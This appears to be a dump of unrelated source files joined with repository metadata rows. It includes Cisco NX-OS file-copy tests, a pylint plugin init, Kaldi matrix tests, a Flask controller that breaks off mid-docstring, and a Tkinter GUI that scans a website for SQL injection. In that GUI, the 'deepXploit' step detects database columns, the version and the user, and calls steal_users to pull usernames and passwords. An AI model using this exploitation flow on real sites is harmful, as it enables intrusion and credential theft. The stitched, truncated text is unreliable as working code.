2014 n9000-dk9.6.1.2.I2.1.bin\n 353457152 Nov 02 15:14:40 2014 n9000-dk9.6.1.2.I3.1.bin\n 37612335 Nov 02 15:20:00 2014 n9000-epld.6.1.2.I3.1.img\n 9888 Oct 08 18:35:39 2015 n9k1_cfg\n 73970 Oct 09 16:30:54 2015 n9k2_all_cfg\n 7105 Oct 08 19:48:41 2015 n9k2_cfg\n 7142 Oct 08 18:49:19 2015 n9k2_cfg_safe\n 21293 Oct 09 17:16:57 2015 n9k2_cp\n 4096 Aug 10 20:17:35 2015 netmiko/\n 18187 Oct 12 20:31:20 2015 new_typo.conf\n 17927 Oct 12 18:25:40 2015 newcpfile\n 535352320 Mar 15 15:39:31 2016 nxos.7.0.3.I2.1.bin\n 4096 Jan 28 15:33:36 2015 onep/\n 6079 Oct 06 14:46:33 2015 pn9k1_cfg.bak\n 54466560 Jan 28 12:48:30 2015 puppet-1.0.0-nx-os-SPA-k9.ova\n 9698 Sep 19 05:43:12 2014 sart\n 4096 Feb 05 15:15:30 2015 scriaspts/\n 4096 Feb 05 15:09:35 2015 scripts/\n 3345 Feb 19 21:04:50 2015 standardconfig.cfg\n 21994 Oct 23 15:32:18 2015 travis_ping\n 18038 Oct 12 19:32:17 2015 tshootcp\n 4096 Mar 15 15:48:59 2016 virt_strg_pool_bf_vdc_1/\n 4096 Jan 28 15:30:29 2015 virtual-instance/\n 125 Mar 15 15:48:12 2016 virtual-instance.conf\n 2068 Mar 16 09:58:23 2016 vlan.dat\nUsage for bootflash://sup-local\n 2425626624 bytes used\n19439792128 bytes free\n21865418752 bytes total\n'
mock_getsize.return_value = 10
result = self.fc.enough_remote_space()
self.assertEqual(result, True)
mock_getsize.assert_called_with('/path/to/source_file')
@mock.patch('os.path.getsize')
def test_not_enough_space(self, mock_getsize):
self.device.show.return_value = ' 4096 Mar 15 17:06:51 2016 .rpmstore/\n 3651 May 19 18:26:19 2014 20140519_182619_poap_6121_init.log\n 3651 May 19 18:34:38 2014 20140519_183438_poap_5884_init.log\n 23167 Jul 11 19:55:32 2014 20140711_195320_poap_5884_init.log\n 3735 Oct 09 18:00:43 2015 20151009_180036_poap_6291_init.log\n 2826 Oct 12 20:17:32 2015 abc\n 7160 Oct 06 13:49:57 2015 cfg_flowtracker1\n 7123 Oct 08 19:26:48 2015 cfg_flowtracker1_2\n 89620 Oct 09 18:04:41 2015 clean_n9k2_all_cfg\n 2773 Oct 09 18:04:18 2015 clean_n9k2_cfg\n 17339 Oct 09 19:58:44 2015 clean_n9k2_cp\n 18203 Oct 12 19:41:21 2015 clean_n9k2_cp2\n 18118 Oct 12 21:03:57 2015 config_2015-10-12_17:03:46.308598\n 18118 Oct 12 21:03:58 2015 config_2015-10-12_17:03:47.338797\n 18118 Oct 12 21:04:03 2015 config_2015-10-12_17:03:52.012664\n 18118 Oct 12 21:06:17 2015 config_2015-10-12_17:06:05.026284\n 18118 Oct 12 21:07:03 2015 config_2015-10-12_17:06:50.357353\n 18118 Oct 12 21:08:13 2015 config_2015-10-12_17:08:01.145064\n 18118 Oct 12 21:12:55 2015 config_2015-10-12_17:12:43.603017\n 18118 Oct 12 21:13:38 2015 config_2015-10-12_17:13:25.476126\n 18098 Oct 12 21:14:40 2015 config_2015-10-12_17:14:29.411540\n 18118 Oct 12 21:14:43 2015 config_2015-10-12_17:14:32.442546\n 18099 Oct 12 21:14:46 2015 config_2015-10-12_17:14:35.595983\n 18118 Oct 12 21:16:03 2015 config_2015-10-12_17:15:51.501546\n 18118 Oct 12 21:16:20 2015 config_2015-10-12_17:16:09.478200\n 18118 Oct 12 21:16:21 2015 config_2015-10-12_17:16:10.613538\n 18099 Oct 12 21:16:25 2015 config_2015-10-12_17:16:13.730374\n 18118 Oct 12 21:16:30 2015 config_2015-10-12_17:16:18.856276\n 18118 Oct 12 21:16:36 2015 config_2015-10-12_17:16:24.817255\n 4096 Jan 11 20:00:40 2016 configs/\n 5365 Feb 05 15:57:55 2015 configs:jaay.cfg\n 5365 Feb 05 15:51:31 2015 configs:jay.cfg\n 18061 Oct 09 19:12:42 2015 cp_with_shutdown\n 154 Feb 19 21:33:05 2015 eth3.cfg\n 65 Feb 19 21:18:28 2015 eth_1_1.cfg\n 4096 Aug 10 18:54:09 2015 home/\n 18111 Oct 12 20:30:41 2015 initial.conf\n 4096 Mar 15 15:42:22 2016 lost+found/\n 309991424 May 19 18:23:41 2014 n9000-dk9.6.1.2.I2.1.bin\n 353457152 Nov 02 15:14:40 2014 n9000-dk9.6.1.2.I3.1.bin\n 37612335 Nov 02 15:20:00 2014 n9000-epld.6.1.2.I3.1.img\n 9888 Oct 08 18:35:39 2015 n9k1_cfg\n 73970 Oct 09 16:30:54 2015 n9k2_all_cfg\n 7105 Oct 08 19:48:41 2015 n9k2_cfg\n 7142 Oct 08 18:49:19 2015 n9k2_cfg_safe\n 21293 Oct 09 17:16:57 2015 n9k2_cp\n 4096 Aug 10 20:17:35 2015 netmiko/\n 18187 Oct 12 20:31:20 2015 new_typo.conf\n 17927 Oct 12 18:25:40 2015 newcpfile\n 535352320 Mar 15 15:39:31 2016 nxos.7.0.3.I2.1.bin\n 4096 Jan 28 15:33:36 2015 onep/\n 6079 Oct 06 14:46:33 2015 pn9k1_cfg.bak\n 54466560 Jan 28 12:48:30 2015 puppet-1.0.0-nx-os-SPA-k9.ova\n 9698 Sep 19 05:43:12 2014 sart\n 4096 Feb 05 15:15:30 2015 scriaspts/\n 4096 Feb 05 15:09:35 2015 scripts/\n 3345 Feb 19 21:04:50 2015 standardconfig.cfg\n 21994 Oct 23 15:32:18 2015 travis_ping\n 18038 Oct 12 19:32:17 2015 tshootcp\n 4096 Mar 15 15:48:59 2016 virt_strg_pool_bf_vdc_1/\n 4096 Jan 28 15:30:29 2015 virtual-instance/\n 125 Mar 15 15:48:12 2016 virtual-instance.conf\n 2068 Mar 16 09:58:23 2016 vlan.dat\nUsage for bootflash://sup-local\n 2425626624 bytes used\n19439792128 bytes free\n21865418752 bytes total\n'
mock_getsize.return_value = 100000000000000000
result = self.fc.enough_remote_space()
self.assertEqual(result, False)
mock_getsize.assert_called_with('/path/to/source_file')
@mock.patch('os.path.isfile')
def test_local_file_exists(self, mock_isfile):
mock_isfile.return_value = True
result = self.fc.local_file_exists()
expected = True
self.assertEqual(result, expected)
mock_isfile.assert_called_with('/path/to/source_file')
@mock.patch('os.path.isfile')
def test_local_file_doesnt_exist(self, mock_isfile):
mock_isfile.return_value = False
result = self.fc.local_file_exists()
expected = False
self.assertEqual(result, expected)
mock_isfile.assert_called_with('/path/to/source_file')
@mock.patch.object(FileCopy, 'get_local_md5')
def test_file_already_exists(self, mock_local_md5):
mock_local_md5.return_value = 'b211e79fbaede5859ed2192b0fc5f1d5'
self.device.show.return_value = {'file_content_md5sum': 'b211e79fbaede5859ed2192b0fc5f1d5\n'}
result = self.fc.already_transfered()
self.assertEqual(result, True)
self.device.show.assert_called_with('show file bootflash:source_file md5sum', raw_text=False)
mock_local_md5.assert_called_with()
@mock.patch.object(FileCopy, 'get_local_md5')
def test_file_doesnt_already_exists(self, mock_local_md5):
mock_local_md5.return_value = 'abcdef12345'
self.device.show.return_value = {'file_content_md5sum': 'b211e79fbaede5859ed2192b0fc5f1d5\n'}
result = self.fc.already_transfered()
self.assertEqual(result, False)
self.device.show.assert_called_with('show file bootflash:source_file md5sum', raw_text=False)
mock_local_md5.assert_called_with()
def test_remote_file_doesnt_exists(self):
self.device.show.return_value = 'No such file'
result = self.fc.remote_file_exists()
self.assertEqual(result, False)
self.device.show.assert_called_with('dir bootflash:/source_file', raw_text=True)
def test_remote_file_exists(self):
self.device.show.return_value = ' 5 Mar 23 00:48:15 2016 smallfile\nUsage for bootflash://sup-local\n 2425630720 bytes used\n19439788032 bytes free\n21865418752 bytes total\n'
result = self.fc.remote_file_exists()
self.assertEqual(result, True)
self.device.show.assert_called_with('dir bootflash:/source_file', raw_text=True)
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
self.fc.send()
mock_paramiko.SSHClient.assert_called_with()
mock_ssh.set_missing_host_key_policy.assert_called_with(mock_paramiko.AutoAddPolicy.return_value)
mock_ssh.connect.assert_called_with(allow_agent=False,
hostname=self.device.host,
look_for_keys=False,
password=self.device.password,
port=22,
username=self.device.username)
mock_SCP.assert_called_with(mock_ssh.get_transport.return_value)
mock_SCP.return_value.put.assert_called_with('/path/to/source_file', 'bootflash:source_file')
mock_SCP.return_value.close.assert_called_with()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_get_file(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
self.fc.get()
mock_paramiko.SSHClient.assert_called_with()
mock_ssh.set_missing_host_key_policy.assert_called_with(mock_paramiko.AutoAddPolicy.return_value)
mock_ssh.connect.assert_called_with(allow_agent=False,
hostname=self.device.host,
look_for_keys=False,
password=self.device.password,
port=22,
username=self.device.username)
mock_SCP.assert_called_with(mock_ssh.get_transport.return_value)
mock_SCP.return_value.get.assert_called_with('bootflash:source_file', '/path/to/source_file')
mock_SCP.return_value.close.assert_called_with()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file_error_local_not_exist(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = False
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
with self.assertRaises(FileTransferError):
self.fc.send()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file_error_not_enough_space(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = False
mock_ssh = mock_paramiko.SSHClient.return_value
with self.assertRaises(FileTransferError):
self.fc.send()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file_transfer_error(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
mock_SCP.return_value.put.side_effect = Exception
with self.assertRaises(FileTransferError):
self.fc.send()
mock_paramiko.SSHClient.assert_called_with()
mock_ssh.set_missing_host_key_policy.assert_called_with(mock_paramiko.AutoAddPolicy.return_value)
mock_ssh.connect.assert_called_with(allow_agent=False,
hostname=self.device.host,
look_for_keys=False,
password=self.device.password,
port=22,
username=self.device.username)
mock_SCP.assert_called_with(mock_ssh.get_transport.return_value)
mock_SCP.return_value.put.assert_called_with('/path/to/source_file', 'bootflash:source_file')
mock_SCP.return_value.close.assert_called_with()
if __name__ == "__main__":
unittest.main()
| 19,245
| 2,313
| 23
|
1ba7e9d00ac9ddde32d332f71e982fac582852a8
| 1,154
|
py
|
Python
|
lcd-numbers/pylint/checkers/__init__.py
|
kelesi/coedcop
|
2bdbac207cf6f81de70b92c644c40663bbea8c8a
|
[
"MIT"
] | 1
|
2017-12-08T15:55:17.000Z
|
2017-12-08T15:55:17.000Z
|
lcd-numbers/pylint/checkers/__init__.py
|
kelesi/coedcop
|
2bdbac207cf6f81de70b92c644c40663bbea8c8a
|
[
"MIT"
] | null | null | null |
lcd-numbers/pylint/checkers/__init__.py
|
kelesi/coedcop
|
2bdbac207cf6f81de70b92c644c40663bbea8c8a
|
[
"MIT"
] | null | null | null |
"""Jeff Bay's Object Calisthenics Rules."""
# 1. One level of indentation per method
# * Pylint's "checkers.refactoring", max-nested-blocks=1
# * Pylint's "checkers.design_analysis", max-branches=1
# * DONE
# 2. Don't use the ELSE keyword
import checkers.no_else
# * also Pylint's "checkers.refactoring", max-nested-blocks=1
# * DONE
# 3. Wrap all primitives and Strings
# 4. First class collections
import checkers.first_class_collections
# * knows [], (), list(), set() and comprehensions.
# TODO add support for more types of collections
# * (kind of) DONE
# 5. One dot per line
import checkers.one_dot_per_line
# * DONE
# 6. Don't abbreviate
# TODO short names
# * good-names=reset
# 7. Keep all entities small
import checkers.small_entities
# * no class over 45 statements, no module over 10 classes, no module over 45 statements.
# * (kind of) DONE
# 8. No classes with more than two instance variables
import checkers.two_instance_variables
# * also Pylint's "checkers.design_analysis", max-attributes=2
# * DONE
# 9. No getters/setters/properties
import checkers.no_properties
# TODO do not use manual getters/setters
# * (kind of) DONE
| 26.837209
| 89
| 0.738302
|
"""Jeff Bay's Object Calisthenics Rules."""
# 1. One level of indentation per method
# * Pylint's "checkers.refactoring", max-nested-blocks=1
# * Pylint's "checkers.design_analysis", max-branches=1
# * DONE
# 2. Don't use the ELSE keyword
import checkers.no_else
# * also Pylint's "checkers.refactoring", max-nested-blocks=1
# * DONE
# 3. Wrap all primitives and Strings
# 4. First class collections
import checkers.first_class_collections
# * knows [], (), list(), set() and comprehensions.
# TODO add support for more types of collections
# * (kind of) DONE
# 5. One dot per line
import checkers.one_dot_per_line
# * DONE
# 6. Don't abbreviate
# TODO short names
# * good-names=reset
# 7. Keep all entities small
import checkers.small_entities
# * no class over 45 statements, no module over 10 classes, no module over 45 statements.
# * (kind of) DONE
# 8. No classes with more than two instance variables
import checkers.two_instance_variables
# * also Pylint's "checkers.design_analysis", max-attributes=2
# * DONE
# 9. No getters/setters/properties
import checkers.no_properties
# TODO do not use manual getters/setters
# * (kind of) DONE
| 0
| 0
| 0
|
0892a02aefb143a24befa8f3ebf7c11b8155f8f2
| 1,794
|
py
|
Python
|
args.py
|
stevievb/sagemaker-labeljob-scoreboard
|
038456cd2d83ba4bf365ecb305bf443cdc1aa404
|
[
"Apache-2.0"
] | null | null | null |
args.py
|
stevievb/sagemaker-labeljob-scoreboard
|
038456cd2d83ba4bf365ecb305bf443cdc1aa404
|
[
"Apache-2.0"
] | null | null | null |
args.py
|
stevievb/sagemaker-labeljob-scoreboard
|
038456cd2d83ba4bf365ecb305bf443cdc1aa404
|
[
"Apache-2.0"
] | null | null | null |
# © 2020 Amgen Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# function to help parse query params from bokeh server url
DEFAULT_PLOT_HEIGHT = 500
DEFAULT_PLOT_WIDTH = 800
| 32.618182
| 105
| 0.672241
|
# © 2020 Amgen Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# function to help parse query params from bokeh server url
DEFAULT_PLOT_HEIGHT = 500
DEFAULT_PLOT_WIDTH = 800
def parse_args(args):
try:
height = int(args.get('height')[0])
except:
height = DEFAULT_PLOT_HEIGHT
try:
width = int(args.get('width')[0])
except:
width = DEFAULT_PLOT_WIDTH
try:
labeling_job_name = args.get('labeling_job_name')[0].decode('utf-8')
except:
print('A labeling job query parameter is required e.g, labeling_job_name=a-test-job-name')
exit(1)
try:
bucket = args.get('bucket')[0].decode('utf-8')
except:
print('A bucket query parameter is required e.g, bucket=an-s3-bucket-name')
exit(1)
try:
prefix = args.get('prefix')[0].decode('utf-8')
except:
print('A prefix parameter is required e.g, prefix=a/prefix/job-name/annotations/worker-response')
exit(1)
try:
user_pool_id = args.get('user_pool_id')[0].decode('utf-8')
except:
print('A user_pool_id parameter is required e.g, user_pool_id=us-west-2_adfsdasf')
exit(1)
return height, width, labeling_job_name, bucket, prefix, user_pool_id
| 1,062
| 0
| 23
|
f7e47ef168d23cb2dc99e0ac2263c621df593dbd
| 132
|
py
|
Python
|
server/src/resources/__init__.py
|
AlexandreBattut/centrale
|
28d1aa53abb88e7ffb87ee1d64cb698a2c76402a
|
[
"MIT"
] | null | null | null |
server/src/resources/__init__.py
|
AlexandreBattut/centrale
|
28d1aa53abb88e7ffb87ee1d64cb698a2c76402a
|
[
"MIT"
] | null | null | null |
server/src/resources/__init__.py
|
AlexandreBattut/centrale
|
28d1aa53abb88e7ffb87ee1d64cb698a2c76402a
|
[
"MIT"
] | null | null | null |
from .user import UserResource
from .movie import MovieResource,MovieAuthorResource
from .note import NoteResource, NoteAllResource
| 33
| 52
| 0.863636
|
from .user import UserResource
from .movie import MovieResource,MovieAuthorResource
from .note import NoteResource, NoteAllResource
| 0
| 0
| 0
|
ae7b9a5ad2f42b1085d8218767395ee08e327173
| 5,994
|
py
|
Python
|
gui.py
|
kratantjain/SQLiVS
|
6b91cc454742c753ef002ac52c01ddf09bdcf8ed
|
[
"MIT"
] | null | null | null |
gui.py
|
kratantjain/SQLiVS
|
6b91cc454742c753ef002ac52c01ddf09bdcf8ed
|
[
"MIT"
] | null | null | null |
gui.py
|
kratantjain/SQLiVS
|
6b91cc454742c753ef002ac52c01ddf09bdcf8ed
|
[
"MIT"
] | 1
|
2018-10-28T17:47:24.000Z
|
2018-10-28T17:47:24.000Z
|
from Tkinter import *
from tkMessageBox import *
from tkFileDialog import *
from SQLinjector import *
import time
import websitedata
Home()
| 41.625
| 127
| 0.656823
|
from Tkinter import *
from tkMessageBox import *
from tkFileDialog import *
from SQLinjector import *
import time
import websitedata
def checkvuln(wsite,name):
inject=[]
global result
for x in name:
sqlinject=x
inject.append(wsite.replace("FUZZ",sqlinject))
showinfo('Wait'," Checking website for vulnerability please wait")
result=injector(inject)
process()
def deepXploit():
global columns
global version
global curr_user
global steal_usr
global passwrd
columns=detect_columns(wsite)
version=detect_version(wsite)
curr_user=detect_user(wsite)
steal_usr,passwrd=steal_users(wsite)
def xploit():
pro.destroy()
xploy=Tk()
showinfo('Exploit', "website is under deep Explotation wait ..!")
xploy.geometry('1024x577')
xploy.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
xploy.title("SQL Injection Vulnerability Scanner")
Label(xploy,image=pic).grid(row=0,column=0,rowspan=20,columnspan=10)
Label(xploy,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=0,column=0,columnspan=10)
Label(xploy,text='Results:', font='Harrington 16 bold underline' ,bg='white').grid(row=2,column=0)
Label(xploy,text='No. of columns:-', font='Harrington 14 bold underline' ,bg='white').grid(row=6,column=0)
Label(xploy,text='Version:-', font='Harrington 14 bold underline' ,bg='white').grid(row=7,column=0)
Label(xploy,text='Current Database User:-', font='Harrington 14 bold underline' ,bg='white').grid(row=8,column=0)
## Label(xploy,text='Usernames & passwords:-', font='Harrington 14 bold underline' ,bg='white').grid(row=10,column=0)
for x in columns:
Label(xploy, text=x,font='Harrington 14 bold underline' ,bg='white').grid(row=6,column=(1+(int(columns.index(x)))))
## xploy.mainloop()
Label(xploy, text=version,font='Harrington 14 bold underline',bg='white').grid(row=7,column=1)
Label(xploy, text=curr_user,font='Harrington 14 bold underline' ,bg='white').grid(row=8,column=1)
## for x in steal_usr:
## Label(xploy,text=x,font='Harrington 14 bold underline' ,bg='white').grid(row=10,column=(1+(int(steal_usr.index(x)))))
## xploy.mainloop()
## for x in passwrd:
## Label(xploy,text=x,font='Harrington 14 bold underline' ,bg='white').grid(row=11,column=(1+(int(passwrd.index(x)))))
## xploy.mainloop()
xploy.mainloop()
def report():
p1.destroy()
global rep
rep=Tk()
rep.geometry('1024x577')
rep.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
rep.title("SQL Injection Vulnerability Scanner")
Label(rep,image=pic).grid(row=0,column=0,rowspan=10,columnspan=10)
Label(rep,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=0,column=0,columnspan=10)
Button(rep, text="back", bg='white', command=repback).grid(row=1, column=8)
Label(rep,text='Report:', font='Harrington 16 bold underline' ,bg='white').grid(row=2,column=0)
rep.mainloop()
def repback():
rep.destroy()
Home()
def process():
global pro
p1.destroy()
pro=Tk()
pro.geometry('1024x577')
pro.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
Label(pro,image=pic).grid(row=0,column=0,rowspan=20,columnspan=10)
pro.title("SQL Injection Vulnerability Scanner")
Label(pro,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=1,column=0,columnspan=10)
Label(pro,text='Processing:', font='Harrington 16 bold underline' ,bg='white').grid(row=2,column=0,sticky='W')
Label(pro,text='Testing errors:-', font='Harrington 14 bold ' ,bg='white').grid(row=3,column=0,sticky='W')
'''def testres(wsite,name):
inject=[]
for z in name:
y=(wsite.replace("FUZZ",z))
Label(pro,text='' , bg='white').grid(row=4,column=0,sticky='EWNS')
Label(pro,text=y, bg='white').grid(row=4,column=0,sticky='EW')
break'''
global i
i=int(0)
for x in result:
i=int(i+1)
Label(pro,text=x,font='Harrington 12 bold',bg='white').grid(row=5+i,column=0,sticky='NS')
if (len(result) != 0):
showinfo('Results','Website is vulnerable to sql injection')
Button(pro,text='Exploit',bg='white',command=lambda:[deepXploit(),xploit(),]).grid(row=10,column=5,sticky='W')
else :
showinfo('Results','Website is not vulnerable to sql injection')
pro.mainloop()
def checkres():
if not result:
showinfo('Results',"Not vulnerable")
def Home():
global p1
p1=Tk()
global s
p1.geometry('1024x577')
p1.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
Label(p1,image=pic).grid(row=0,column=0,rowspan=10,columnspan=10)
p1.title("SQL Injection Vulnerability Scanner")
Label(p1,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=0,column=0,columnspan=10)
Label(p1,text='Website:', font='Harrington 14 bold' ,bg='white').grid(row=2,column=0)
s=Entry(p1,bg='LightCyan4', cursor='dot')
s.grid(row=2,column=1,columnspan=5,sticky='EW')
Label(p1,text='Injection file select:', font='Harrington 14 bold' ,bg='white').grid(row=8,column=0)
def fileselect():
injectionfile=askopenfilename(title = "Select injection dictionary file",filetypes = (("text files","*.txt"),))
f = open(injectionfile, "r")
global name
name = f.read().splitlines()
print(name)
def webget():
global wsite
wsite=str(s.get()+"FUZZ")
print(wsite)
Button(p1, text='select file', command=fileselect, bg='white', cursor='dot').grid(row=8, column=1)
Button(p1, text="Check",bg='white',command=lambda:[webget(),checkvuln(wsite,name),]).grid(row=6,column=8, sticky='EWNS')
p1.mainloop()
Home()
| 5,646
| 0
| 199
|
1f013a9bb78006e16890563e1f2078779f4852ab
| 3,131
|
py
|
Python
|
src/pybind/matrix/kaldi_matrix_pybind_test.py
|
aadps/kaldi
|
cd351bb31c98f9d540c409478cbf2c5fef1853ca
|
[
"Apache-2.0"
] | null | null | null |
src/pybind/matrix/kaldi_matrix_pybind_test.py
|
aadps/kaldi
|
cd351bb31c98f9d540c409478cbf2c5fef1853ca
|
[
"Apache-2.0"
] | null | null | null |
src/pybind/matrix/kaldi_matrix_pybind_test.py
|
aadps/kaldi
|
cd351bb31c98f9d540c409478cbf2c5fef1853ca
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2019 Mobvoi AI Lab, Beijing, China (author: Fangjun Kuang)
# Apache 2.0
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))
import unittest
import numpy as np
import kaldi
if __name__ == '__main__':
unittest.main()
| 29.537736
| 71
| 0.545513
|
#!/usr/bin/env python3
# Copyright 2019 Mobvoi AI Lab, Beijing, China (author: Fangjun Kuang)
# Apache 2.0
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))
import unittest
import numpy as np
import kaldi
class TestFloatSubMatrix(unittest.TestCase):
def test_from_numpy(self):
num_rows = 5
num_cols = 6
data = np.arange(num_rows * num_cols).reshape(
num_rows, num_cols).astype(np.float32)
# =============================================================
# build a FloatSubMatrix() from a numpy array; memory is shared
# -------------------------------------------------------------
m = kaldi.FloatSubMatrix(data)
self.assertEqual(m.NumRows(), num_rows)
self.assertEqual(m.NumCols(), num_cols)
self.assertEqual(m.Stride(), data.strides[0] / 4)
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(m[r, c], data[r, c])
# memory is shared between numpy array and FloatSubMatrix
for r in range(num_rows):
for c in range(num_cols):
m[r, c] += 10
self.assertEqual(m[r, c], data[r, c])
# =============================================================
# Convert a FloatSubMatrix to a numpy array; memory is shared
# -------------------------------------------------------------
m_reference_count = sys.getrefcount(m)
d = m.numpy()
self.assertEqual(m_reference_count + 1, sys.getrefcount(m))
d += 10 # m is also changed because of memory sharing
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(d[r, c], m[r, c])
del d
self.assertEqual(m_reference_count, sys.getrefcount(m))
class TestFloatMatrix(unittest.TestCase):
def test_to_numpy(self):
# first, build a kaldi matrix
num_rows = 6
num_cols = 8
m = kaldi.FloatMatrix(row=num_rows, col=num_cols)
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(m[r, c], 0)
m_reference_count = sys.getrefcount(m)
# now to numpy; memory is shared
d = m.numpy()
self.assertEqual(m_reference_count + 1, sys.getrefcount(m))
d += 10
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(d[r, c], m[r, c])
del d
self.assertEqual(m_reference_count, sys.getrefcount(m))
class TestGeneralMatrix(unittest.TestCase):
def test_from_base_matrix(self):
num_rows = 5
num_cols = 6
m = kaldi.FloatMatrix(row=num_rows, col=num_cols)
mg = kaldi.GeneralMatrix(m)
mi = kaldi.FloatMatrix()
mg.GetMatrix(mi)
self.assertEqual(mi.NumRows(), num_rows)
self.assertEqual(mi.NumCols(), num_cols)
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(mi[r, c], 0)
if __name__ == '__main__':
unittest.main()
| 2,612
| 65
| 150
|
17e2ec4a244bb94a85b8daab658bef83ab4ca1af
| 1,982
|
py
|
Python
|
src/controllers/supporting_lists/controller.py
|
MaxVanHoucke/esp-uantwerp
|
6f2129d60954b198f233e75956a4f5c675a03cbc
|
[
"MIT"
] | null | null | null |
src/controllers/supporting_lists/controller.py
|
MaxVanHoucke/esp-uantwerp
|
6f2129d60954b198f233e75956a4f5c675a03cbc
|
[
"MIT"
] | null | null | null |
src/controllers/supporting_lists/controller.py
|
MaxVanHoucke/esp-uantwerp
|
6f2129d60954b198f233e75956a4f5c675a03cbc
|
[
"MIT"
] | null | null | null |
from flask import Blueprint, request, render_template, jsonify
from flask_login import current_user
from src.controllers.supporting_lists.manage_lists import manage, update_item
from src.models.type import TypeDataAccess
from src.models.tag import TagDataAccess
from src.models.research_group import *
from src.models.study_field import *
from src.models.employee import *
from src.models.db import get_db
bp = Blueprint('manage_lists', __name__)
@bp.route('/modify-lists', methods=["GET", "POST"])
def modify_lists():
"""
Handles the GET & POST request to '/modify-lists'.
GET: requests to render page
POST: request managing sent data
:return: Json with failure status / template rendering / function call to manage data
"""
if not current_user.is_authenticated or current_user.role == "student":
return jsonify({'success': False}), 400, {'ContentType': 'application/json'}
if request.method == "GET":
return render_template('supporting_lists.html')
else:
return manage(request.json)
@bp.route('/get-all-list-data', methods=['GET'])
def get_all_list_data():
"""
Handles the GET request to '/get-all-list-data'.
:return: Json with all list data
"""
conn = get_db()
all_types = TypeDataAccess(conn).get_types(False)
all_tags = TagDataAccess(conn).get_tags()
all_groups = ResearchGroupDataAccess(conn).get_research_groups(False)
all_employees = EmployeeDataAccess(conn).get_employees(False)
result = {
"types": [obj.to_dict() for obj in all_types],
"tags": all_tags,
"research groups": [obj.to_dict() for obj in all_groups],
"employees": [obj.to_dict() for obj in all_employees]
}
return jsonify(result)
@bp.route("/update-profile", methods=["POST"])
def update_profile():
"""
